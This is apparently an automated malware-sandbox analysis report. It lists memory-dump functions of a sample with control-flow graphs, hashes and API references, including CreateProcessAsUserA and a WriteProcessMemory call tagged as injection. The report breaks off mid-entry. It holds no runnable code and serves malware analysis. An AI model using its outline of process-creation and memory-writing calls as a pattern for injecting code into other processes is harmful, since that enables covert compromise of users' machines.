2984 4ee2f5a-4ee2f68 2982->2984 2987 4ee2f7a-4ee2f88 2983->2987 2984->2987 2991 4ee2f8e-4ee2f97 2987->2991 2992 4ee3aa1-4ee3c40 2987->2992 2991->2992 2997 4ee2f9d-4ee2fa6 2991->2997 3034 4ee3c42-4ee3da0 2992->3034 2997->2992 3003 4ee2fac-4ee324a 2997->3003 3003->2502 3075 4ee3250-4ee3331 3003->3075 3022->2502 3083 4ee463a-4ee48bb 3022->3083 3034->2911 3034->2912 3075->2502 3092 4ee3337-4ee358f 3075->3092 3083->2502 3127 4ee48c1-4ee4a86 3083->3127 3092->2502 3128 4ee3595-4ee37f8 3092->3128 3127->2502 3159 4ee4a8c-4ee4b90 3127->3159 3128->2502 3165 4ee37fe-4ee3a92 3128->3165 3165->2502 3194 4ee3a98-4ee3a9c 3165->3194 3194->3034
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.380942576.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4ee0000_pdP5Rv9pPW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fe4f26e22c2c721c5618540bb7b21a49f48ffbd759d4486bf577c07fe20c34ad
                                                              • Instruction ID: 60f21994205983000030d326ed65f42d74d35c1f3057eaf0b965ec137efce6bf
                                                              • Opcode Fuzzy Hash: fe4f26e22c2c721c5618540bb7b21a49f48ffbd759d4486bf577c07fe20c34ad
                                                              • Instruction Fuzzy Hash: 04A38170E042288FC759EF29DD856ADBBB1FB89305F0044EAD488A7755DB385E88CF46
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 04EE5BC8 Relevance: 4.6, Instructions: 4618COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 3195 4ee5bc8-4ee5cd0 3206 4ee5cd6-4ee5db4 3195->3206 3207 4eea7d4-4eea7e4 3195->3207 3206->3207 3230 4ee5dba-4ee5e7d 3206->3230 3210 4eea7e6-4eea7f7 3207->3210 3211 4eea7d1 3207->3211 3212 4eea7fb-4eea812 3210->3212 3214 4eea813-4eea815 3212->3214 3214->3212 3215 4eea817-4eea81d 3214->3215 3215->3214 3219 4eea81f-4eea830 3215->3219 3220 4eea833-4eea854 3219->3220 3220->3220 3221 4eea856-4eea922 3220->3221 3225 4eea924-4eea93d 3221->3225 3225->3225 3226 4eea93f-4eea94a 3225->3226 3230->3207 3237 4ee5e83-4ee63d3 3230->3237 3237->3207 3281 4ee63d9-4ee64b1 3237->3281 3281->3207 3289 4ee64b7-4ee69bc 3281->3289 3289->3207 3331 4ee69c2-4ee6aa2 3289->3331 3331->3207 3339 4ee6aa8-4ee7098 3331->3339 3339->3207 3387 4ee709e-4ee7162 3339->3387 3387->3207 3393 4ee7168-4ee75b8 3387->3393 3393->3207 3429 4ee75be-4ee7617 3393->3429 3435 4ee7619-4ee7625 3429->3435 3436 4ee7667-4ee7816 3429->3436 3437 4ee762f-4ee7635 3435->3437 3438 4ee7627-4ee762d 3435->3438 3456 4ee781b-4ee78d7 3436->3456 3440 4ee763f-4ee7664 3437->3440 3438->3440 3462 4ee78dd-4ee78e6 3456->3462 3463 4ee7d66-4ee81da 3456->3463 3462->3207 3464 4ee78ec-4ee7903 3462->3464 3463->3207 3549 4ee81e0-4ee85ca 3463->3549 3467 4ee7909-4ee79f5 3464->3467 3468 4ee7cc3-4ee7d60 3464->3468 3494 4ee79fb-4ee7a01 3467->3494 3495 4ee7ae8-4ee7b36 3467->3495 3468->3462 3468->3463 3494->3207 3496 4ee7a07-4ee7ae2 3494->3496 3505 4ee7b38-4ee7b66 3495->3505 3506 4ee7b97-4ee7bbe 3495->3506 3496->3494 3496->3495 3505->3506 3513 4ee7b68-4ee7b95 3505->3513 3509 4ee7bc4-4ee7cbe 3506->3509 3509->3463 3513->3509 3584 4ee8687-4ee872a 3549->3584 3585 4ee85d0-4ee8682 3549->3585 3596 4ee8730-4ee880e 3584->3596 3585->3596 3605 4ee9a48-4ee9bea 3596->3605 3606 4ee8814-4ee8a24 3596->3606 3605->3207 3633 4ee9bf0-4ee9c1d 3605->3633 3606->3207 3650 4ee8a2a-4ee8acb 3606->3650 3633->3207 3635 4ee9c23-4ee9d26 3633->3635 3635->3207 3652 4ee9d2c-4ee9fd5 3635->3652 3650->3207 3663 4ee8ad1-4ee8b64 3650->3663 3652->3207 3712 4ee9fdb-4eea270 3652->3712 3674 4ee8b66-4ee8b6c 3663->3674 3675 4ee8b82-4ee8b90 3663->3675 3674->3207 3677 4ee8b72-4ee8b80 3674->3677 3681 4ee8b92-4ee8ba0 3675->3681 3677->3681 3685 4ee9756-4ee98e9 3681->3685 3686 4ee8ba6-4ee8baf 3681->3686 3731 4ee98eb-4ee9a42 3685->3731 3686->3685 3690 4ee8bb5-4ee8bbe 3686->3690 3690->3685 3696 4ee8bc4-4ee8eb6 3690->3696 3696->3207 3773 4ee8ebc-4ee8f93 3696->3773 3712->3207 3775 4eea276-4eea517 3712->3775 3731->3605 3731->3606 3773->3207 3791 4ee8f99-4ee91f6 3773->3791 3775->3207 3816 4eea51d-4eea6ad 3775->3816 3791->3207 3829 4ee91fc-4ee9492 3791->3829 3816->3207 3840 4eea6b3-4eea7d0 3816->3840 3829->3207 3868 4ee9498-4ee9747 3829->3868 3840->3211 3868->3207 3890 4ee974d-4ee9751 3868->3890 3890->3731
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.380942576.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4ee0000_pdP5Rv9pPW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 90bd0bb3c1dba39eead31ec7c8370dfa2cf57f195cd27cfbf4a52aec85ca6e60
                                                              • Instruction ID: 1b99a3b80faebf18901641764350d915681d2da8f1dc96fd323ad3d51edace0b
                                                              • Opcode Fuzzy Hash: 90bd0bb3c1dba39eead31ec7c8370dfa2cf57f195cd27cfbf4a52aec85ca6e60
                                                              • Instruction Fuzzy Hash: A8A36F70E44128CFC759EF29D9896ACBBB2FB49301F0045EAD488A7715DB386E98CF45
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 04EB5CF0 Relevance: 4.4, Instructions: 4387COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 3891 4eb5cf0-4eb5d5e 3896 4eb5d64-4eb5e47 3891->3896 3906 4eb5e4d-4eb6026 3896->3906 3907 4eba815-4eba826 3896->3907 3906->3907 3925 4eb602c-4eb612b 3906->3925 3925->3907 3933 4eb6131-4eb6625 3925->3933 3933->3907 3970 4eb662b-4eb6709 3933->3970 3970->3907 3977 4eb670f-4eb6bcd 3970->3977 3977->3907 4017 4eb6bd3-4eb6c98 3977->4017 4017->3907 4024 4eb6c9e-4eb70f7 4017->4024 4024->3907 4061 4eb70fd-4eb7208 4024->4061 4061->3907 4069 4eb720e-4eb7755 call 4eb58e0 4061->4069 4069->3907 4113 4eb775b-4eb77ae 4069->4113 4119 4eb77b0-4eb77b9 4113->4119 4120 4eb77f5-4eb7a65 4113->4120 4121 4eb77bb-4eb77be 4119->4121 4122 4eb77c0-4eb77c3 4119->4122 4146 4eb7a6b-4eb7a74 4120->4146 4147 4eb7ed7-4eb8317 4120->4147 4124 4eb77cd-4eb77f2 4121->4124 4122->4124 4146->3907 4148 4eb7a7a-4eb7a91 4146->4148 4147->3907 4227 4eb831d-4eb874c 4147->4227 4151 4eb7e3d-4eb7ed1 4148->4151 4152 4eb7a97-4eb7b7a 4148->4152 4151->4146 4151->4147 4175 4eb7b80-4eb7b86 4152->4175 4176 4eb7c76-4eb7cc1 4152->4176 4175->3907 4178 4eb7b8c-4eb7c70 4175->4178 4188 4eb7cc3-4eb7cf1 4176->4188 4189 4eb7d22-4eb7d49 4176->4189 4178->4175 4178->4176 4188->4189 4195 4eb7cf3-4eb7d20 4188->4195 4190 4eb7d4f-4eb7e38 4189->4190 4190->4147 4195->4190 4264 4eb880b-4eb88bf 4227->4264 4265 4eb8752-4eb8806 4227->4265 4278 4eb88c5-4eb899b 4264->4278 4265->4278 4286 4eb9b0d-4eb9c9b 4278->4286 4287 4eb89a1-4eb8ba2 4278->4287 4286->3907 4312 4eb9ca1-4eb9cc8 4286->4312 4287->3907 4325 4eb8ba8-4eb8c81 4287->4325 4312->3907 4314 4eb9cce-4eb9dd3 4312->4314 4314->3907 4334 4eb9dd9-4eba029 4314->4334 4325->3907 4339 4eb8c87-4eb8d2f 4325->4339 4334->3907 4381 4eba02f-4eba288 4334->4381 4352 4eb8d4d-4eb8d58 4339->4352 4353 4eb8d31-4eb8d37 4339->4353 4359 4eb8d5a-4eb8d68 4352->4359 4353->3907 4355 4eb8d3d-4eb8d4b 4353->4355 4355->4359 4363 4eb97ee-4eb99ab 4359->4363 4364 4eb8d6e-4eb8d77 4359->4364 4411 4eb99ad-4eb9b07 4363->4411 4364->4363 4368 4eb8d7d-4eb8d86 4364->4368 4368->4363 4374 4eb8d8c-4eb8fc9 4368->4374 4374->3907 4426 4eb8fcf-4eb908e 4374->4426 4381->3907 4441 4eba28e-4eba52c 4381->4441 4411->4286 4411->4287 4426->3907 4445 4eb9094-4eb92e5 4426->4445 4441->3907 4491 4eba532-4eba6cd 4441->4491 4445->3907 4487 4eb92eb-4eb954e 4445->4487 4487->3907 4526 4eb9554-4eb97df 4487->4526 4491->3907 4517 4eba6d3-4eba812 4491->4517 4526->3907 4555 4eb97e5-4eb97e9 4526->4555 4555->4411
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.380751416.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4eb0000_pdP5Rv9pPW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 53cec318e39947ff80ecc5bc2bb76ff9029adb833d3adc527324fd66e2b712eb
                                                              • Instruction ID: 3a0dcce0264a7e9c79aa7f554e421467c2342c759dc27d4091a3bb67d95ddc41
                                                              • Opcode Fuzzy Hash: 53cec318e39947ff80ecc5bc2bb76ff9029adb833d3adc527324fd66e2b712eb
                                                              • Instruction Fuzzy Hash: 7A934E70E04228CFCB99EF29D9956ADBBB2FB49301F0044E9D488A7715DB346E88CF45
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 04EB0040 Relevance: 4.3, Instructions: 4309COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 4556 4eb0040-4eb015c 4568 4eb4a53-4eb4a76 4556->4568 4569 4eb0162-4eb0305 4556->4569 4569->4568 4586 4eb030b-4eb040f 4569->4586 4586->4568 4595 4eb0415-4eb0724 4586->4595 4595->4568 4620 4eb072a-4eb0810 4595->4620 4620->4568 4628 4eb0816-4eb0caf 4620->4628 4628->4568 4665 4eb0cb5-4eb0db0 4628->4665 4665->4568 4673 4eb0db6-4eb1345 4665->4673 4673->4568 4716 4eb134b-4eb144e 4673->4716 4716->4568 4724 4eb1454-4eb191e 4716->4724 4724->4568 4765 4eb1924-4eb197d 4724->4765 4771 4eb197f-4eb198b 4765->4771 4772 4eb19cd-4eb1c2d 4765->4772 4773 4eb198d-4eb1993 4771->4773 4774 4eb1995-4eb199b 4771->4774 4796 4eb1c33-4eb1c3c 4772->4796 4797 4eb2076-4eb249c 4772->4797 4776 4eb19a5-4eb19ca 4773->4776 4774->4776 4796->4568 4798 4eb1c42-4eb1c59 4796->4798 4797->4568 4878 4eb24a2-4eb28fb 4797->4878 4801 4eb1c5f-4eb1d42 4798->4801 4802 4eb1fd3-4eb2070 4798->4802 4826 4eb1e09-4eb1e57 4801->4826 4827 4eb1d48-4eb1d4e 4801->4827 4802->4796 4802->4797 4839 4eb1e59-4eb1e87 4826->4839 4840 4eb1eb8-4eb1edf 4826->4840 4827->4568 4829 4eb1d54-4eb1e03 4827->4829 4829->4826 4829->4827 4839->4840 4845 4eb1e89-4eb1eb6 4839->4845 4841 4eb1ee5-4eb1fce 4840->4841 4841->4797 4845->4841 4917 4eb2901-4eb29b2 4878->4917 4918 4eb29b7-4eb2a63 4878->4918 4929 4eb2a69-4eb2b3f 4917->4929 4918->4929 4938 4eb3d29-4eb3ebe 4929->4938 4939 4eb2b45-4eb2d75 4929->4939 4938->4568 4966 4eb3ec4-4eb3ef1 4938->4966 4939->4568 4988 4eb2d7b-4eb2e40 4939->4988 4966->4568 4968 4eb3ef7-4eb4005 4966->4968 4968->4568 4987 4eb400b-4eb426e 4968->4987 4987->4568 5035 4eb4274-4eb44f8 4987->5035 4988->4568 5001 4eb2e46-4eb2ed9 4988->5001 5013 4eb2edb-4eb2ee1 5001->5013 5014 4eb2ef7-4eb2f05 5001->5014 5013->4568 5015 4eb2ee7-4eb2ef5 5013->5015 5018 4eb2f07-4eb2f15 5014->5018 5015->5018 5022 4eb2f1b-4eb2f24 5018->5022 5023 4eb3a63-4eb3be5 5018->5023 5022->5023 5028 4eb2f2a-4eb2f33 5022->5028 5065 4eb3be7-4eb3d23 5023->5065 5028->5023 5034 4eb2f39-4eb31b7 5028->5034 5034->4568 5103 4eb31bd-4eb32c4 5034->5103 5035->4568 5098 4eb44fe-4eb4795 5035->5098 5065->4938 5065->4939 5098->4568 5142 4eb479b-4eb4946 5098->5142 5103->4568 5121 4eb32ca-4eb3517 5103->5121 5121->4568 5159 4eb351d-4eb37fe 5121->5159 5142->4568 5170 4eb494c-4eb4a33 5142->5170 5159->4568 5195 4eb3804-4eb3a54 5159->5195 5186 4eb4a3b-4eb4a50 5170->5186 5195->4568 5214 4eb3a5a-4eb3a5e 5195->5214 5214->5065
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.380751416.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4eb0000_pdP5Rv9pPW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: daab2b3a4fd2bff44e2a8d5d0be6e781fdcc79512de8e203765c718710c2fce8
                                                              • Instruction ID: 26bea5f13c320db5db97e366487129d190e8b6070216d5de6fb48ad2512d63ce
                                                              • Opcode Fuzzy Hash: daab2b3a4fd2bff44e2a8d5d0be6e781fdcc79512de8e203765c718710c2fce8
                                                              • Instruction Fuzzy Hash: 12934D70E04128CFCB59EF29D9856ADBBB1FB89305F0045E9D488A3755DB386E88CF46
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 04ECAF60 Relevance: 4.2, Instructions: 4211COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 5215 4ecaf60-4ecb23d 5243 4ecb25c-4ecb5a3 call d5f968 5215->5243 5244 4ecb23f-4ecb259 5215->5244 5283 4ecf45c-4ecf46a 5243->5283 5284 4ecb5a9-4ecbe98 5243->5284 5244->5243 5287 4ecf471 5283->5287 5284->5287 5397 4ecbe9e-4ecc0ac 5284->5397 5289 4ecf476-4ecf488 call d5fd38 5287->5289 5291 4ecf48a 5289->5291 5294 4ecf48f-4ecf4a1 call d5fd38 5291->5294 5296 4ecf4a3 5294->5296 5298 4ecf5d7-4ecf5e4 5296->5298 5397->5289 5421 4ecc0b2-4ecc292 5397->5421 5421->5287 5444 4ecc298-4ecd1e4 call d5fdf8 call d5feb8 5421->5444 5619 4ecd7ba-4ecd7c1 5444->5619 5620 4ecd1ea-4ecd7b4 5444->5620 5621 4ecf447-4ecf455 5619->5621 5622 4ecd7c7-4ecd7e9 5619->5622 5620->5619 5621->5283 6054 4ecd7ec call 4ebc6f8 5622->6054 6055 4ecd7ec call 4ebc3f2 5622->6055 6056 4ecd7ec call 4ebc3a0 5622->6056 5624 4ecd7ee-4ecdd0b 5749 4ecdd11-4ece252 5624->5749 5823 4ece258-4ece37f 5749->5823 5824 4ece384-4ece6cb 5749->5824 6057 4ece382 call 4ebc6f8 5823->6057 6058 4ece382 call 4ebc3f2 5823->6058 6059 4ece382 call 4ebc3a0 5823->6059 5824->5749 5883 4ece6d1-4ecea97 5824->5883 6050 4ecea9a call 4ebc6f8 5883->6050 6051 4ecea9a call 4ebc3f2 5883->6051 6052 4ecea9a call 4ebc3a0 5883->6052 5927 4ecea9c-4ececa2 5952 4ececad-4ecee8b 5927->5952 5953 4ececa4-4ececa7 5927->5953 5952->5287 5976 4ecee91-4ecf345 5952->5976 5953->5952 5976->5294 6033 4ecf34b-4ecf36b 5976->6033 6045 4ecf36e call 4ebc7c8 6033->6045 6046 4ecf36e call 4ebc7d0 6033->6046 6035 4ecf370-4ecf442 6035->5298 6045->6035 6046->6035 6050->5927 6051->5927 6052->5927 6054->5624 6055->5624 6056->5624 6057->5824 6058->5824 6059->5824
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.380799620.0000000004EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4ec0000_pdP5Rv9pPW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 48e2d121749042f059f2dbb81c31f75960728c6da0ed21b70f8373b1a2f67e62
                                                              • Instruction ID: 0cc09b9439fe54b51dfe839d977ab6bb66199bcc07794cf3548a5e947c2b4297
                                                              • Opcode Fuzzy Hash: 48e2d121749042f059f2dbb81c31f75960728c6da0ed21b70f8373b1a2f67e62
                                                              • Instruction Fuzzy Hash: 8C835B70A052188BCB54EF39DD8979EB7B2FB89304F0044AAD488A3754DF396D99CF19
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 04ECAF51 Relevance: 4.2, Instructions: 4188COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 6061 4ecaf51-4ecb23d 6090 4ecb25c-4ecb5a3 call d5f968 6061->6090 6091 4ecb23f-4ecb259 6061->6091 6130 4ecf45c-4ecf46a 6090->6130 6131 4ecb5a9-4ecbe98 6090->6131 6091->6090 6134 4ecf471 6130->6134 6131->6134 6244 4ecbe9e-4ecc0ac 6131->6244 6136 4ecf476-4ecf488 call d5fd38 6134->6136 6138 4ecf48a 6136->6138 6141 4ecf48f-4ecf4a1 call d5fd38 6138->6141 6143 4ecf4a3 6141->6143 6145 4ecf5d7-4ecf5e4 6143->6145 6244->6136 6268 4ecc0b2-4ecc292 6244->6268 6268->6134 6291 4ecc298-4ecd1e4 call d5fdf8 call d5feb8 6268->6291 6466 4ecd7ba-4ecd7c1 6291->6466 6467 4ecd1ea-4ecd7b4 6291->6467 6468 4ecf447-4ecf455 6466->6468 6469 4ecd7c7-4ecd7e9 6466->6469 6467->6466 6468->6130 6896 4ecd7ec call 4ebc6f8 6469->6896 6897 4ecd7ec call 4ebc3f2 6469->6897 6898 4ecd7ec call 4ebc3a0 6469->6898 6471 4ecd7ee-4ecdd0b 6596 4ecdd11-4ece252 6471->6596 6670 4ece258-4ece37f 6596->6670 6671 4ece384-4ece6cb 6596->6671 6899 4ece382 call 4ebc6f8 6670->6899 6900 4ece382 call 4ebc3f2 6670->6900 6901 4ece382 call 4ebc3a0 6670->6901 6671->6596 6730 4ece6d1-4ecea97 6671->6730 6892 4ecea9a call 4ebc6f8 6730->6892 6893 4ecea9a call 4ebc3f2 6730->6893 6894 4ecea9a call 4ebc3a0 6730->6894 6774 4ecea9c-4ececa2 6799 4ececad-4ecee8b 6774->6799 6800 4ececa4-4ececa7 6774->6800 6799->6134 6823 4ecee91-4ecf345 6799->6823 6800->6799 6823->6141 6880 4ecf34b-4ecf36b 6823->6880 6903 4ecf36e call 4ebc7c8 6880->6903 6904 4ecf36e call 4ebc7d0 6880->6904 6882 4ecf370-4ecf442 6882->6145 6892->6774 6893->6774 6894->6774 6896->6471 6897->6471 6898->6471 6899->6671 6900->6671 6901->6671 6903->6882 6904->6882
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.380799620.0000000004EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EC0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4ec0000_pdP5Rv9pPW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 54544457bd500011631aabe3d426db7d8aaa782a9b2dc42f3e6c258306c00c6b
                                                              • Instruction ID: 12cc66aa728d8e3fa1b913d778ad1c46a444b09509c4882ea5a1054d8627a080
                                                              • Opcode Fuzzy Hash: 54544457bd500011631aabe3d426db7d8aaa782a9b2dc42f3e6c258306c00c6b
                                                              • Instruction Fuzzy Hash: 37835B70A052188BCB54EF39DD8979EB7B2FB89304F0044AAD488A3754DF396D99CF19
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00D5F968 Relevance: 1.8, APIs: 1, Instructions: 261processCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateProcessAsUserA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?), ref: 00D5FBF8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.374211806.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d50000_pdP5Rv9pPW.jbxd
                                                              Similarity
                                                              • API ID: CreateProcessUser
                                                              • String ID:
                                                              • API String ID: 2217836671-0
                                                              • Opcode ID: 3035c9768e64a7384c8bf9820f0408273756ec9eb90f1438ba62cca404b4e165
                                                              • Instruction ID: c739b88ca53d92d79460d4b67fcfe5d7dac240b589b603ab1ff426bbb7cef65e
                                                              • Opcode Fuzzy Hash: 3035c9768e64a7384c8bf9820f0408273756ec9eb90f1438ba62cca404b4e165
                                                              • Instruction Fuzzy Hash: 1BA13971E002199FDF10CF68C9817EDBBB2EB49315F048169EC19EB291DB749989CF92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 04ED0006 Relevance: 1.6, Instructions: 1556COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.380895325.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04ED0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4ed0000_pdP5Rv9pPW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d3de59ba780a4f3bd58b43f4fd68f6d71cd452d89bf2175e481cc8ec3ba661cd
                                                              • Instruction ID: 3a5749201b7b3cb02d0603add573772fd1fa40ccb2b3db00f51d8e34af99fd8d
                                                              • Opcode Fuzzy Hash: d3de59ba780a4f3bd58b43f4fd68f6d71cd452d89bf2175e481cc8ec3ba661cd
                                                              • Instruction Fuzzy Hash: F2F26F70E45228CFCB19EF29E98969CBBB1FB49301F0085E9D488A7754DB346E88CF55
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 04EE0006 Relevance: 1.5, Instructions: 1529COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.380942576.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4ee0000_pdP5Rv9pPW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 72106d0aa57f59042ba66e49c9d7cb6d1eacf4be6438cab02bebb52fa095cd49
                                                              • Instruction ID: 7879dde26b392d3b25afe8e77ecabb240a49b79dd9d5571181fa4d7458f757c4
                                                              • Opcode Fuzzy Hash: 72106d0aa57f59042ba66e49c9d7cb6d1eacf4be6438cab02bebb52fa095cd49
                                                              • Instruction Fuzzy Hash: 47E25070E44128CFCB58EF2AE9856ADBBB1FB49301F0045EAD488A7755DB346E88CF45
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 027D0394 Relevance: 2.5, Strings: 2, Instructions: 40COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 6908 27d0394-27d03b8 6909 27d03ba-27d03c0 6908->6909 6910 27d03d0-27d03d4 6908->6910 6911 27d03c4-27d03ce 6909->6911 6912 27d03c2 6909->6912 6913 27d03ee-27d03f2 6910->6913 6914 27d03d6-27d03dc 6910->6914 6911->6910 6912->6910 6918 27d03f9-27d03fb 6913->6918 6915 27d03de 6914->6915 6916 27d03e0-27d03ec 6914->6916 6915->6913 6916->6913
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.374552667.00000000027D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_27d0000_pdP5Rv9pPW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: xql$xql
                                                              • API String ID: 0-2396326202
                                                              • Opcode ID: 5226fb1ba8c08546ce7b889373262d5c50affd561dff4ea7ef71fa8bb0f7a22f
                                                              • Instruction ID: d6071f83c8cd151edfdafdbd9872ae44bc4d58d43ffeba5cf759b8ad9343ad04
                                                              • Opcode Fuzzy Hash: 5226fb1ba8c08546ce7b889373262d5c50affd561dff4ea7ef71fa8bb0f7a22f
                                                              • Instruction Fuzzy Hash: 6CF0A421B0D3924FC727462C581116E7B721ED3114B1D42FBC881DFB96DA308C4AC3A7
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 027D0257 Relevance: 2.5, Strings: 2, Instructions: 35COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 6920 27d0257-27d0270 6921 27d0288-27d028c 6920->6921 6922 27d0272-27d0278 6920->6922 6923 27d028e-27d0294 6921->6923 6924 27d02a6-27d02aa 6921->6924 6925 27d027c-27d0286 6922->6925 6926 27d027a 6922->6926 6927 27d0298-27d02a4 6923->6927 6928 27d0296 6923->6928 6930 27d02b1-27d02b3 6924->6930 6925->6921 6926->6921 6927->6924 6928->6924
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.374552667.00000000027D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027D0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_27d0000_pdP5Rv9pPW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: xql$xql
                                                              • API String ID: 0-2396326202
                                                              • Opcode ID: f910e5f0b5ff1eeaa6fbb10dd4a4ccc1269cc14cc2e2b21a959493e9bac69f12
                                                              • Instruction ID: 8ec861bb83c52e01714ab2b8650f2bd7e814f5fe7b638143e4df5fe198d8c4df
                                                              • Opcode Fuzzy Hash: f910e5f0b5ff1eeaa6fbb10dd4a4ccc1269cc14cc2e2b21a959493e9bac69f12
                                                              • Instruction Fuzzy Hash: 4AF09021B0E3924FD767426C492427B7BB24FC7220B1E82FA8481CBA55DA359C42C3A7
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 04EBC3F2 Relevance: 1.9, APIs: 1, Instructions: 449injectionCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 7485 4ebc3f2-4ebc749 7488 4ebc74b-4ebc757 7485->7488 7489 4ebc759-4ebc792 WriteProcessMemory 7485->7489 7488->7489 7490 4ebc79b-4ebc7bc 7489->7490 7491 4ebc794-4ebc79a 7489->7491 7491->7490
                                                              APIs
                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 04EBC785
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.380751416.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4eb0000_pdP5Rv9pPW.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessWrite
                                                              • String ID:
                                                              • API String ID: 3559483778-0
                                                              • Opcode ID: 3d247583952612620904c7b6b3065b94fcca794d95c3ae367380e11b88a6ccbc
                                                              • Instruction ID: 744408dc261c2f35f7f7bb41e8f78a849bd75e37af3355e62f4c6645cad20065
                                                              • Opcode Fuzzy Hash: 3d247583952612620904c7b6b3065b94fcca794d95c3ae367380e11b88a6ccbc
                                                              • Instruction Fuzzy Hash: AB3166B19043889FCB01CFA9C884BDEBBF4EF4A314F14846AE858A7251D338A545CBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 04EBC3A0 Relevance: 1.9, APIs: 1, Instructions: 432COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.380751416.0000000004EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4eb0000_pdP5Rv9pPW.jbxd
                                                              Similarity
